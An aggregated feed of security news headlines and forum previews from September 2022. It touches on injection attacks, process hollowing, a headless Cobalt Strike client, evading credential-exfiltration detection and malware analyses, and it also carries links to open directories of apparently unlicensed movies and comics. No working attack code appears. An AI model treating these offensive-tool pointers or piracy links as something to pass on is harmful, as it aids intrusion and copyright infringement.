    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    How I found 3 rare security bugs in a day
    No content preview
    New technique 403 bypass lyncdiscover.microsoft.com
    No content preview
    Take Confusion Out of IAM Policies, AWS S3 Bucket Policies and AWS S3 ACLs
    No content preview
    Raccoon Stealer v2 Malware Analysis
    No content preview
    How To Perform Command Injection Attacks (DVWA) For Aspiring Hackers! — StackZero
    No content preview
    How to prevent more than 200 million users from using Google services
    No content preview
  • Open

    Announcing The Auto-Refreshing Official Kubernetes CVE Feed
    Article URL: https://kubernetes.io/blog/2022/09/12/k8s-cve-feed-alpha/ Comments URL: https://news.ycombinator.com/item?id=32806366 Points: 1 # Comments: 0

  • Open

    How big is your IT Security team and how do you people manage
    Just curious more so on how big your IT Security team is, where you are based geographically and what are the vibes like submitted by /u/securm0n [link] [comments]
    How to construct API POST request without documentation?
    Recently I tried Vulnerable REST API which can be found at https://github.com/erev0s/VAmPI I don't have any issue with GET requests as all I need is the right url without any http body $ curl 127.0.0.1:5000 { "message": "VAmPI the Vulnerable API", "Help": "VAmPI is a vulnerable on purpose API. It was created in order to evaluate the efficiency of third party tools in identifying vulnerabilities in APIs but it can also be used in learning/teaching purposes." } For POST requests, an http body is required to send the necessary data to the API endpoints. Let's take a look at these 2 which can be found on the github page. POST /users/v1/register Register new user POST /users/v1/login Login to VAmPI Unfortunately, this is the only information given and there is no documentation on how to craft the request (http body). Since I don't know the http body format for these 2 POST requests, I'm getting 400 BAD REQUEST which is expected. Request POST /users/v1/login HTTP/1.1 Host: 127.0.0.1:5000 Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 Request POST /users/v1/register HTTP/1.1 Host: 127.0.0.1:5000 Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 Similar Response for both Requests HTTP/1.0 400 BAD REQUEST Content-Type: application/problem+json Content-Length: 115 Server: Werkzeug/1.0.1 Python/3.9.12 { "detail": "None is not of type 'object'", "status": 400, "title": "Bad Request", "type": "about:blank" } How do I construct the right http body for a POST request if I don't have knowledge/documentation about that? submitted by /u/w0lfcat [link] [comments]
  • Open

    anyone know how to fix this encase problem?
    submitted by /u/shalnark90 [link] [comments]
    Hash mismatch
    I did a logical disk acquisition on a USB stick using DD and calculated the SHA-1 and MD5 hash using Windows' builtin certutil tool. I then had FTK Imager calculate/verify the hash of the image generated by DD and they matched, as expected. As an experiment, I did a logical disk capture of the physical USB stick through FTK, generated an image in the .E01 format, then compared the calculated hash values between FTK's builtin hash calculation tool and Windows' certutil of that FTK generated .E01 file. To my utter surprise, they don't match. What is going on here? Can someone chime in? Video Proof https://reddit.com/link/xbk9fo/video/ibztcd1fw8n91/player submitted by /u/jjThomson69 [link] [comments]
  • Open

    How requests-ip-rotator for bypassing rate limiting got me 6th on the leaderboard for ipv4.games
    submitted by /u/fiasco_averted [link] [comments]
    "Pull Request Hijacking" - bypassing code review enforcement in GitHub
    submitted by /u/dotanoam [link] [comments]
    Thoughts on the use of NoVNC for phishing campaigns
    submitted by /u/gid0rah [link] [comments]
  • Open

    Google Drive question....
    I am able to find open Google Drives and add various movies to my drive for later download. Anything 8 gigs will start downloading and as it gets close to completion, abruptly ends/crashes. (I don't recall the specific error rn.) I use Chrome. I have done the usual internet research to no avail. Does anyone know why this is happening? Firewall? Memory issue? A timing issue where the file has to download in a certain amount of time (1 hour time limit)? Chrome addons? A known issue with file size? This issue hasn't always been there. It seems to have started earlier this year. Any help would be appreciated. submitted by /u/Jazr_Dude [link] [comments]
    Lots of movies-English and other languages. - dig around in the directories
    http://103.156.66.58/m1t1/movies/ submitted by /u/looster2018 [link] [comments]
  • Open

    Blind SQL-Injection API (SOAP!)
    Exploiting WSDLs with Wsdler Continue reading on Medium »
    AWS Wish List
    Make a wish. It might be granted! #awswishlist Continue reading on Cloud Security »
    Lets talk about methodology
    I’ve talked about methodology before on this blog when it’s comes to how to learn better whilst doing bug bounty or pentesting but I’ve… Continue reading on Medium »
    My First Valid Bug “Open Redirection”
    Hey everyone, I am SYRINE. Cyber Security Enthusiast, eJPT Certified, and currently focusing on bug bounty. Continue reading on Medium »
    How to hack without Linux Part :-2
    Hii all, I’m back after a cool break, so where is my system buddy? As a promise, I will continue the series How to Hack with Linux, so… Continue reading on Medium »
  • Open

    SecWiki News 2022-09-11 Review
    Physically simulated touchscreen taps by 路人甲 Analysis of the PyPI phishing campaign by 路人甲 A few things about WebSocket hijacking by 路人甲 The three pillars of cybersecurity and attack vectors by ourren Exploring intelligent network traffic orchestration by ourren For more of the latest articles, visit SecWiki
  • Open

    Access to arbitrary file of the Nextcloud Android app from within the Nextcloud Android app
    Nextcloud disclosed a bug submitted by luchua: https://hackerone.com/reports/1408692 - Bounty: $250
  • Open

    SPY NEWS: 2022 — Week 36
    Summary of the espionage-related news stories for the Week 36 (September 4–10) of 2022. Continue reading on Medium »
  • Open

    HP Support Assistant Has a DLL Hijacking Vulnerability
    Article URL: https://www.ghacks.net/2022/09/08/hp-support-assistant-has-a-dll-hijacking-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32797230 Points: 1 # Comments: 0

  • Open

    Creating and configuring a Honeypot account in Active Directory
    Hi readers, here we will be looking into the detection of password spraying attempts by adversaries. Specifically, we will be creating an… Continue reading on Medium »
    Red Team Part 2 — Red Team Engagements | TryHackMe
    Hello world and welcome to Haxez, in this post I’m going to be talking about Red Team Engagements. Again, for those who haven’t been… Continue reading on Medium »
  • Open

    Ultimate Nokia Ringtone Collection, a collection of 2500+ Nokia ringtones and alerts
    submitted by /u/fusoxide [link] [comments]
    Comics ! ...... and books
    http://ns377932.ip-5-196-89.eu/freecomics/books/Unknown/ submitted by /u/looster2018 [link] [comments]
    Tons of mechanical , automotive and RV .Pdfs....
    https://www.wanderlodgeownersgroup.com/downloads/ submitted by /u/looster2018 [link] [comments]
  • Open

    Explosives hidden in toys, Ukraine
    Open source verification review, analyzing cases of mined toys Continue reading on Medium »
    Finding Geolocation using OSINT
    TRYHACKME: Geolocating Images Continue reading on System Weakness »
    OSINT Resources for Pentesters
    As those of us know, OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free… Continue reading on Medium »
    Mobile database with information leaks
    Today there is a large number of data leaks from various online services. Continue reading on Medium »
    Looking Back: An Overview of Pakistan’s first OSINT Championship
    We received more than two dozen applications from individuals of Pakistani origin to compete in OSINT Championship-2022. After necessary… Continue reading on Medium »
  • Open

    CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage
    Internet Bug Bounty disclosed a bug submitted by gquadros_: https://hackerone.com/reports/1652042 - Bounty: $2000
  • Open

    x86matthew - WriteProcessMemoryAPC - Write memory to a remote process using APC calls
    submitted by /u/jeandrew [link] [comments]
  • Open

    Exploiting preshared machine keys
    what are machine keys? Continue reading on Medium »
    How to Find SQL Injection Attack Vulnerabilities in 2022?
    SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there. Continue reading on Medium »
    How I found 3 rare security bug in a day
    Hello everyone, Continue reading on InfoSec Write-ups »
    Introducing 44 cybersecurity YouTube channels (final version):
    1. Hak5 — General cybersecurity coverage. 2. The XSS Rat — Everythug bounty hunting. 3. ITProTV — General cybersecurity coverage.  4… Continue reading on Medium »
    How to Learn Manual SQL Injection for OSCP(Step by Step)
    If you have found sql injection attacks to be confusing and are preparing for oscp but your manual sql injection part is not clear,I am… Continue reading on Medium »
    Capture The Bug is a finalist in the New Zealand Reseller Awards
    Awesome News🎉 Continue reading on Medium »
  • Open

    SecWiki News 2022-09-10 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki
  • Open

    DangerousSavanna attack campaign targeting financial institutions in French-speaking Africa
    Researchers found that more than 85% of financial institutions in Central and West Africa have repeatedly suffered destructive cyberattacks; the investigation found that the financially motivated criminal group DangerousSavanna was behind them.
  • Open

    Is there any particular reason as to why an examiner would encrypt a disk/file they are examining?
    Apologies if I come across as ignorant, but is there any particular reason as to why an examiner would encrypt a file/disk/image they are looking at? Why would someone conceivably make their life harder, given that they'd have to decrypt the disk every single time before examining it? submitted by /u/jjThomson69 [link] [comments]
  • Open

    AmCache Revisited
    Not long ago, I posted about When Windows Lies, and that post really wasn't so much about Windows "lying", per se, as it was about challenging analyst assumptions about artifacts, and recognizing misconceptions. Along the same lines, I've also posted about the (Mis)Use of Artifact Categories, in an attempt to address the reductionist approach that leads analysts to oversimplify and subsequently misinterpret artifacts based on their perceived category (i.e., program execution, persistence, lateral movement, etc.). This misinterpretation of artifacts can lead to incorrect findings, and subsequently, incorrect recommendations for improvements to address identified issues. I recently ran across this LinkedIn post that begins by describing AmCache entries as "evidence of execution", which is so…
  • Open

    Is anyone aware of a Microsoft Excel version of the CVSS calculator?
    Is anyone aware of a Microsoft Excel version of the CVSS version 3.1 calculator? My aim is to be able to dynamically download a list of vulnerabilities and individually score them within Excel using a list of environmental and temporal metrics. https://www.first.org/cvss/calculator/3.1 submitted by /u/EmergencyShow [link] [comments]
    Where can I report the IP of a command and control server?
    I had the misfortune of having one of my servers hacked yesterday. Fortunately, I caught it early and not much damage was done. I am currently studying for the flare-on malware reversing competition so I saw this as an opportunity to reverse a real-world sample. It turned out to be the dropper and scanner portion of the dota3 miner. It wasn't up long enough to install the miner portion. After removing the server from the network, I cleaned its mess up and I managed to reverse it down to its Perl source. The IP of the CC server and some publicly known credentials are in the source. Nmap shows that the machine is actually up with the correct ports open. Is there a best place to report this IP to for possible takedown? EDIT: Digging around has led me to this article. https://www.countercraftsec.com/blog/post/cve-2021-4034-vulnerability-exploited-russia-vs-ukraine-situation/ The forensics that I did look like a different deployment method but the payload is basically the same. Also the strings are written in Portuguese. submitted by /u/jerryrw [link] [comments]
  • Open

    Process Hollowing in C#. Shellcode Injection Techniques.
    Another way for shellcode execution by using process hollowing. https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-2/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Avoiding Memory Scanners
    submitted by /u/dmchell [link] [comments]
  • Open

    How I found 3 RXSS on the Lululemon bug bounty program
    No content preview
    Reflected XSS DVWA — An Exploit With Real World Consequences — StackZero
    No content preview
  • Open

    Silifuzz: Fuzzing CPUs by Proxy
    Article URL: https://github.com/google/silifuzz Comments URL: https://news.ycombinator.com/item?id=32787131 Points: 3 # Comments: 0

  • Open

    Red Team Part 1 — Red Team Fundamentals | TryHackMe
    Hello world and welcome to Haxez, in this post I’m going to be going through the first room in the Red Team learning path on TryHackMe… Continue reading on Medium »
    Atomic Red Team — DumpLSASS
    Red Canary Threat Research released 2 new AtomicTestHarnesses — Continue reading on Medium »
    Some Important Hacking Terminologies
    We live in the era of technology where everything related to automation has escalated very fast, and along with this it has been seen that… Continue reading on Medium »
    TryHackMe — Red Teaming | Initial Access | Part-3
    This would be third write-up of the Red Teaming learning Path Series, We would start with second chapter Initial Access; Explore the… Continue reading on Medium »
    Red Team Assessment And Penetration Testing Service
    Red Team Assessment And Penetration Testing Service Continue reading on Medium »
  • Open

    SiliFuzz - Fuzzing CPUs by proxy
    submitted by /u/sanitybit [link] [comments]
    “GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs
    submitted by /u/sanitybit [link] [comments]
    Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection
    submitted by /u/CyberMasterV [link] [comments]
    Spotlight: Occlum open source software for Intel SGX
    submitted by /u/laramontoyalaske [link] [comments]
    Fuzzing beyond memory corruption: Finding broader classes of vulnerabilities automatically
    submitted by /u/jeandrew [link] [comments]
  • Open

    Account Takeover by HTML Injection
    Hello readers! Continue reading on Medium »
    SocialPwned OSINT tool
    SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks like Instagram, Linkedin and… Continue reading on Medium »
  • Open

    Open-Source Intelligence: How to Integrate Modern OSINT into Mainstream Intelligence
    Open Source Intelligence (OSINT) is currently undergoing a major transformation as a tool in the intelligence cycle. OSINT has been a… Continue reading on Medium »
    SocialPwned OSINT tool
    SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks like Instagram, Linkedin and… Continue reading on Medium »
  • Open

    SecWiki News 2022-09-09 Review
    SharpHostInfo: a tool for quickly probing intranet host information by ourren Guide to using the intranet penetration tool BloodHound by ourren A netfilter-based backdoor by ourren SQL injection auditing in common Java frameworks by ourren Musings on the quadrant of nation-state cyberattack capabilities by Avenger Govulncheck: a Go supply-chain vulnerability detection tool by ourren For more of the latest articles, visit SecWiki
  • Open

    Cleartext storage of sensitive information at https://staging.status.ai-apps-comms.ibm.com/env can lead to account takeover of several IBM employees
    IBM disclosed a bug submitted by zere: https://hackerone.com/reports/1670586
  • Open

    ManageEngine vulnerability posed code injection risk for password management
    Article URL: https://portswigger.net/daily-swig/manageengine-vulnerability-posed-code-injection-risk-for-password-management-software Comments URL: https://news.ycombinator.com/item?id=32778824 Points: 2 # Comments: 0
  • Open

    Snapchat geo location format
    I'm trying to help sort through some Snapchat geolocation data to determine a person's location based on Snapchat records, and can't seem to find any info on the format used in the reports. While this is not an actual coordinate I'm looking at, it's formatted as: Long: -86.234 ± 9.16 meters Lat 36.234 ± 13.45 meters While the first part is pretty obvious, I can't seem to find any info on what the ± 9.16 meters part means. I've looked through various articles on formats of lat and long, but nothing includes meters. Can anyone explain how the meters work? Entering the coordinates into Google Maps as written doesn't work. I can't find any sites that have the option to enter ± X meters in the coordinates either. submitted by /u/Financial-Tourist272 [link] [comments]
  • Open

    Insufficient Logging and Monitoring
    Introduction Continue reading on InfoSec Write-ups »
    Retired from HackTheBox — Detailed Walkthrough
    No content preview
    Anti-Reversing Techniques (Part 1)
    No content preview
    Malware Analysis — NanoCore Rat
    No content preview
    Malware Analysis — FFDroider
    No content preview
    [Malware Analysis #3] — Disk Writer
    No content preview
  • Open

    WordPress plugin zero-day vulnerability disclosed, already under active exploitation in the wild
    A WordPress plugin named BackupBuddy has a zero-day vulnerability that is being actively exploited.
    Notes on the emergency response to a server intrusion incident
    One day in August, a customer's official website was hacked and remediation had to be completed within a set time. To avoid impact on the customer's business, the lab's staff immediately began emergency handling of the attack.
    pretender: a powerful red-team MitM security testing tool
    pretender is a powerful red-team MitM security testing tool designed specifically for red-team researchers.
    "Provisions on the Administration of Internet Pop-up Information Push Services" released: pop-ups handled with one click
    With the rapid development of the internet and the widespread use of mobile applications, pop-up information push services keep producing new situations and new problems, and regulation must adapt to the circumstances.
    So this is how user privacy gets leaked: over 80% of search websites sell the information
    Although "privacy" no longer has anywhere to hide in the digital world, we rarely think seriously about how exactly privacy gets leaked.
    Portugal's Armed Forces General Staff hit by cyberattack, hundreds of classified NATO documents leaked
    The General Staff of the Portuguese Armed Forces (EMGFA) suffered a cyberattack in which hackers stole a large number of classified NATO documents.
    How to handle bastion host security risks? | FreeBuf enterprise-side group topic discussion
    A bastion host is the system that controls server and network security; when it runs into security risks, how should everyone "resolve the trouble"?
    A penetration test of a BC (gambling) website
    After this penetration test all information was handed over to the police; do not use it for illegal purposes.
  • Open

    cobaltstrike-headless - Headless CobaltStrike client
    submitted by /u/CodeXTF2 [link] [comments]
  • Open

    Constructing an exploit for the Xalan-J XSLT integer truncation vulnerability (CVE-2022-34169)
    Author: thanat0s@360 Advanced Attack and Defense Lab. Original link: http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/ 0x00 Preface This is the first time I have encountered a vulnerability related to Java class bytecode (CVE-2022-34169). Because the exploit script provided by the vulnerability's author did not execute successfully, I tried, based on the vulnerability description combined with my own understanding, to...
  • Open

    How secure are URLs to files in SharePoint OneDrive?
    I've seen a place with a lot of URLs to SharePoint and OneDrive files. I can't remember the context or how I saw these URLs. Must have been in some admin center. First thing that popped into my head was "security issue". As far as I can tell, you can only share files to specific people or people within the organization. I just checked this using my own Microsoft 365. Are there any security issues with these URLs? Thanks! submitted by /u/damienhull [link] [comments]

  • Open

    On The Wire Writeup
    Fishing for clues requires an eye for detail Continue reading on The Sleuth Sheet »
    How to Find a Dossier on a Citizen of Any Country
    EffectGroup is an open source research platform that enables researchers to easily collect, analyze, and visualize data. Continue reading on The Sleuth Sheet »
    Interview: Venessa Ninovic
    Intel Inquirer, Intelligence Analyst, Speaker Continue reading on Medium »
    Fahad Nabeel wins the Pantellica OSINT Championship (2022)
    I’m delighted to announce that Fahad Nabeel has secured first position to earn the title of OSINT Champion (2022) in Pakistan. Continue reading on Medium »
    What Are Sock Puppet Accounts
    I had this question a while back when I noticed that I have been interacting with a sock puppet account for years, I wondered what made it… Continue reading on Medium »
    What is OSINT?
    What is OSINT, and how do you pronounce that? Let’s start with the latter and work our way from there. Continue reading on Medium »
    Quiztime 29 Aug 22
    I saw @bayer_julia’s @quiztime quiz on twitter on 29 August 2022: https://twitter.com/bayer_julia/status/1564355252349984770 and thought… Continue reading on Medium »
    What is HUMINT and why did everyone suddenly remember it?
    What is HUMINT? Continue reading on Medium »
    OSINT Information Gathering with Informer
    As everyone knows information gathering in cyber security and ethical hacking is very important. The more you know about the target, the… Continue reading on Medium »
  • Open

    What kind of housekeeping tasks do you do frequently at work?
    Hi, was wondering what kind of housekeeping/cleaning tasks you do frequently at work relating to cybersecurity. For example, every month we: go through the list of current users on each of our security systems and in turn remove or disable inactive users; check to see users that have not logged onto the network for over 90 days in Azure AD; check user groups. Curious to see what else people do. submitted by /u/securm0n [link] [comments]
    Netgear Routers say I'm getting DoS attacks and knock out my network. Spectrum says nothing is wrong on their side. Any advice?
    For about the last 2 weeks, my network has been going offline a few times a day. I've switched routers (both Netgear brand), called my ISP (Spectrum) several times and gotten nowhere. The logs on my Netgear router are filled with messages like the following:
    [DoS attack: FIN Scan] (6) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:28:22
    [DoS attack: FIN Scan] (5) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:28:01
    [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:27:33
    [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:54
    [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:25
    [DoS attack: FIN Scan] (11) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:05
    [DoS attack: FIN Scan] (10) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:44
    [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:23
    [DoS attack: FIN Scan] (2) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:01
    [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:05:01
    [DoS attack: ACK Scan] (1) attack packets in last 20 sec from ip [142.250.190.74], Wednesday, Sep 07,2022 23:02:28
    [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [107.178.240.159], Wednesday, Sep 07,2022 23:01:43
    Any ideas on what to try? Spectrum says everything looks fine on their end but this is frustrating. Edit to clarify: all devices on the network lose internet connectivity when these messages populate. Phones, desktop PCs, laptops, smart speakers.
    Edit for detail: Router models tested: Netgear Nighthawk 5000, Netgear Nighthawk 7000 submitted by /u/byrd424 [link] [comments]
    For a while I would constantly search inappropriate stuff on my school computer and I got away with it. Should I be worrying about this ever coming back to bite me?
    When I started high school my school gave me a personal computer to work from home and I used to search a lot of porn on it. I know it was dumb and I stopped a while ago, but I've been worrying whether or not they would ever report me to the principal for it. It's been years and I never got in trouble or talked to about it, so I assume if someone at IT did see it they didn't care. My school board usually never cares about what students do with computers as long as they're used for schoolwork and nothing illegal is done with them; for example, I had a friend who used to always search up really bad stuff like suicide methods constantly at the school on school wifi and they never even brought it up to him. Despite this I still constantly worry because my mom works as a secretary at my school, so if something about me gets reported to the principal she will instantly know about it. submitted by /u/Puhskintius23 [link] [comments]
  • Open

    API pentest with Burp Suite without 3rd party tools such as Postman
    I've found an interesting article about API pentesting: https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration "For blackbox tests, however, we'll have to build our packets through trial and error using API debugging/mapping tools, such as Postman, and by capturing valid requests/responses using Burp Suite as a proxy service." I was wondering: Why is Postman required? What is Burp's limitation for API pentesting? Most API pentest tutorials require a combination of Burp + other tools such as Postman. Is it possible to perform an API pentest with only Burp, without Postman or similar tools? submitted by /u/w0lfcat [link] [comments]
    Looking to move from blue->red with rusty coding skills
    I'm looking to make a career move. I'm 45 and currently managing a blue team of 15 analysts. I have a background in system admin, security admin/engineering, Web application development, security apps with WAF, etc. I want to move to red team, but it's been a while and my coding is rusty. I feel like I can get back to proficiency in pretty short order. Any thoughts on how difficult the transition would be for someone like me? submitted by /u/WTFCanID0 [link] [comments]
    Profiling DEV-0270: PHOSPHORUS’ ransomware operations - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
  • Open

    Red Team Introduction — Try Hack Me
    Hello World and welcome to HaXeZ, in this post I’m going to be talking about the new Red Team learning path produced by TryHackMe… Continue reading on Medium »
    Red Team Tools: Hunting for the Top 3 Tools
    By Cyborg Security Continue reading on Medium »
  • Open

    Fuzzing beyond memory corruption: Finding more classes of bugs automatically
    Article URL: https://security.googleblog.com/2022/09/fuzzing-beyond-memory-corruption.html Comments URL: https://news.ycombinator.com/item?id=32771755 Points: 1 # Comments: 0
    Fuzzing JavaScript with open-source tools (live)
    Article URL: https://www.youtube.com/watch?v=Qr6mOm37kNM Comments URL: https://news.ycombinator.com/item?id=32765698 Points: 2 # Comments: 0
    Fuzzing JavaScript with open-source tools (live stream)
    Article URL: https://www.code-intelligence.com/webinar/javascript-fuzzing Comments URL: https://news.ycombinator.com/item?id=32763937 Points: 3 # Comments: 0
  • Open

    Credential Gathering From Third-Party Software
    Users often store passwords in third-party software for convenience – but credential gathering techniques can target this behavior. The post Credential Gathering From Third-Party Software appeared first on Unit 42.
  • Open

    Cross Site Scripting (XSS) for Beginners with Explanation!
    ➜XSS (Cross Site Scripting) Continue reading on Medium »
  • Open

    Attacking Firecracker: AWS' microVM Monitor Written in Rust
    submitted by /u/Gallus [link] [comments]
    Riding the InfoRail to Exploit Ivanti Avalanche – Part 2
    submitted by /u/0xdea [link] [comments]
    Understanding Windows Containers Communication - And a new OSS tool! RPCMon
    submitted by /u/jat0369 [link] [comments]
    cobaltstrike-headless: (mostly) functional headless cobalt strike client.
    submitted by /u/0xdea [link] [comments]
    Shiba Inu Crypto cloud credentials leaked on a public repository!
    submitted by /u/apprakash [link] [comments]
    Fork Bomb for Flutter
    submitted by /u/lmpact_ [link] [comments]
    Bypass Credential Exfiltration Detection - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    Exploiting Laravel based applications with leaked APP_KEYs and Queues
    submitted by /u/Gallus [link] [comments]
    A dangerous way to fix Integer Overflow in Solidity
    submitted by /u/boxiso6989 [link] [comments]
    Monkey 365 is a plugin-based PowerShell module that can be used to review the security posture of your Microsoft cloud environment.
    submitted by /u/sanitybit [link] [comments]
    Attacks on Sysmon Revisited - SysmonEnte
    submitted by /u/sanitybit [link] [comments]
  • Open

    SecWiki News 2022-09-08 Review
    appshark: an automated vulnerability and privacy compliance detection tool by ourren; EasyPen: a graphical security inspection and emergency-response tool by ourren; Learning about storage buckets and hunting their vulnerabilities by ourren. For more of the latest articles, visit SecWiki
  • Open

    What Is Clickjacking and How Do I Prevent It?
    There are a plethora of techniques that attackers use to redirect site visitors and harvest sensitive information on compromised websites. But when most webmasters think about securing their website, they often don’t think about how attackers can inject clicks on it from another site. In today’s article, we’ll explain what clickjacking is, outline the types of clickjacking attacks, describe some examples of what clickjacking looks like, and provide tips on how to prevent clickjacking on your site. Continue reading What Is Clickjacking and How Do I Prevent It? at Sucuri Blog.
  • Open

    Windows Settings says BitLocker is disabled but it's still active
    I encountered a Lenovo notebook where the Windows BitLocker encryption settings showed that BitLocker is disabled. I then booted a Linux system and it couldn't mount the Windows partition. When I checked the partition header it indicated BitLocker encryption as follows: |.X.-FVE-FS-.....| Now I'm wondering why Windows says BitLocker is disabled but somehow it is still active. Can you explain this behavior and maybe share some article / blog post about this? submitted by /u/F-2016 [link] [comments]
    Does someone know which forensics company delivers this piece of hardware?
    submitted by /u/Organic-Cover9407 [link] [comments]
  • Open

    The Crucial Role of Data Center Resiliency in Business Security
    For many organizations, data center operations are handled by the facilities team or a third-party vendor. Although these functions aren’t part of the everyday responsibilities of the IT or Security departments, they are crucial to systems availability and to the ongoing operations of the business. Having a full understanding of the capacity and capabilities of... The post The Crucial Role of Data Center Resiliency in Business Security appeared first on TrustedSec.
  • Open

    Vulnerability that could take the entire Avalanche network down at no cost
    Article URL: https://twitter.com/peter_szilagyi/status/1567835617932808193 Comments URL: https://news.ycombinator.com/item?id=32764435 Points: 1 # Comments: 0
  • Open

    FreeBuf Morning Report | Tens of thousands fooled by a fake Apple launch event livestream; TikTok denies hackers stole its data
    TikTok denies that user data and source code were stolen, saying the source code shared on the hacker forum is not its platform's backend source code at all and was never merged with WeChat data.
    Officially open-sourced! Wuheng Lab releases appshark, an automated vulnerability and privacy compliance detection tool
    Wuheng Lab independently developed the appshark engine for automated detection of vulnerabilities and privacy compliance risks.
    The Cyberspace Administration releases the "Provisions on Administrative Enforcement Procedures of Cyberspace Departments (Draft for Comment)"
    The Provisions comprise five chapters and fifty-six articles, with corresponding norms and requirements for cyberspace departments' institutional building, scope of jurisdiction, detailed application rules, enforcement measures, ordinary procedures for administrative penalties, and execution and case closure.
    Gartner releases the 2022 Magic Quadrant for Cloud Web Application and API Protection
    The cloud web application and API protection market is currently growing rapidly.
    New stealthy malware Shikitega is targeting Linux systems
    The malware uses a multi-stage infection chain to target endpoints and IoT devices.
  • Open

    Analysis of authentication bypass and JDBC injection vulnerabilities in VMware product lines
    Author: xxhzz@星阑科技 PortalLab. Original link: https://mp.weixin.qq.com/s/-NW2gjwCP5R_UwCa7eDc_A Preface After previously analysing CVE-2022-22972 (VMware Workspace ONE Access) and CVE-2022-22954 (VMware Workspace ONE Access SSTI RCE), I found that the security advisory at the time also...
    Analysis of the CVE-2022-0540 Jira authentication bypass vulnerability
    Author: xxhzz@星阑科技 PortalLab. Original link: https://mp.weixin.qq.com/s/fEhzBTl3SVVE072ubwi6EA Preface After analysing the CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF vulnerability in the previous article, I found that Jira had earlier also disclosed an authentication bypass vulnerability, CVE-2022-0540. While the environment was still warm, I looked into the cause of its...
    PyPI phishing campaign | JuiceLedger hackers pivot from fake apps to supply chain attacks
    Author: AMITAI BEN SHUSHAN EHRLICH. Translator: Knownsec 404 Lab translation team. Original link: https://www.sentinelone.com/labs/pypi-phishing-campaign-juiceledger-threat-actor-pivots-from-fake-apps-to-supply-chain-attacks/ Executive summary 1. JuiceLedge...
  • Open

    New technique 403 bypass lyncdiscover.microsoft.com
    Hi I have been working on the HTTP protocol for some time. After checking and researching, I found out that version 1.0 of the HTTP… Continue reading on InfoSec Write-ups »
    403 bypass lyncdiscover.microsoft.com
    Hi I have been working on the HTTP protocol for some time. After checking and researching, I found out that version 1.0 of the HTTP… Continue reading on Medium »
    Proper communication in cybersecurity is essential.
    1. Malware Analysis involves writing reports. 2. Access Management involves writing reports. 3. Bug Bounty Hunting involves writing… Continue reading on Medium »
    27 ways to learn ethical hacking for free:
    1. Root Me — Challenges. 2. Stök’s YouTube — Videos. 3. Hacker101 Videos — Videos. 4. InsiderPhD YouTube — Videos. 5. EchoCTF —… Continue reading on Medium »

  • Open

    What qualifications and certs are worth getting?
    Been working in-house cybersecurity for around 3 years now and so far only have a uni degree in this discipline. Was thinking of getting the following before the end of this calendar year 2022: CompTIA Security+, CCSK. Next year, I was thinking maybe OSCP or CISSP. What are your thoughts? submitted by /u/securm0n [link] [comments]
    Which is better after a security enhancement? (Windows vs Linux)
    We all know that most malware is written to work on Windows. But I think, with security awareness and proper defense mechanisms, Windows can be as secure as Linux. (I haven't much knowledge about Windows security but I am estimating.) I have been using Linux for years and also I am a fan of it. Do we have any security professionals here to explain which can be more secure after security hardening and awareness? Most endpoint devices in corporates use Linux as I have seen, so I think more hardening techniques and products are available for Windows; because of that I am asking this: is it possible to have a more secure system with a Windows device rather than Linux? submitted by /u/pacman0026 [link] [comments]
    Create a notification when somebody opens the folder on Sharepoint
    Hi there, do you know how to create a notification when somebody opens a folder on SharePoint? I found that it probably can be done via O365 Cloud Apps, and I can make a notification when somebody opens a file. But I need to alert when somebody opens the folder and everything that is under this folder/subfolders and so on. submitted by /u/athanielx [link] [comments]
    SQLi Decoding Payload Feasibility
    Hi! I'm currently researching a specific scenario with SQL injections where the target application is able to validate if internal MySQL table names (e.g., information_schema.tables) make any appearance in the SQL query. The obfuscation schemes I have come across are rather for bypassing an IDS/WAF, and most of them would not make sense to appear in a normalized form of a SQL query within the application (e.g., an empty comment in the middle of a table name (information_/**/schema.tables) is not valid SQL). I was wondering if it is technically possible in SQL to build a SQLi payload that decodes a table name from an encoded string and where another query is executed on the decoded table name string, similar to shellcode decoding/encoding schemes. My current understanding is that this cannot work as table names in a FROM clause cannot be strings, but I'm not sure if there is perhaps a MySQL function or mechanism that would make such a payload possible? submitted by /u/TolgaDevSec [link] [comments]
    Looking for a disposable email service that can reuse email addresses
    I am in need of help finding the perfect disposable email service. I want something cheap/free, does not self-destruct emails until deleted, and offers multiple domain options. Any advice? submitted by /u/CandleAggressive5299 [link] [comments]
  • Open

    Exploiting Flipper Zero NFC file loader
    submitted by /u/VVX7 [link] [comments]
    BSidesLV 2022 Conference Recordings
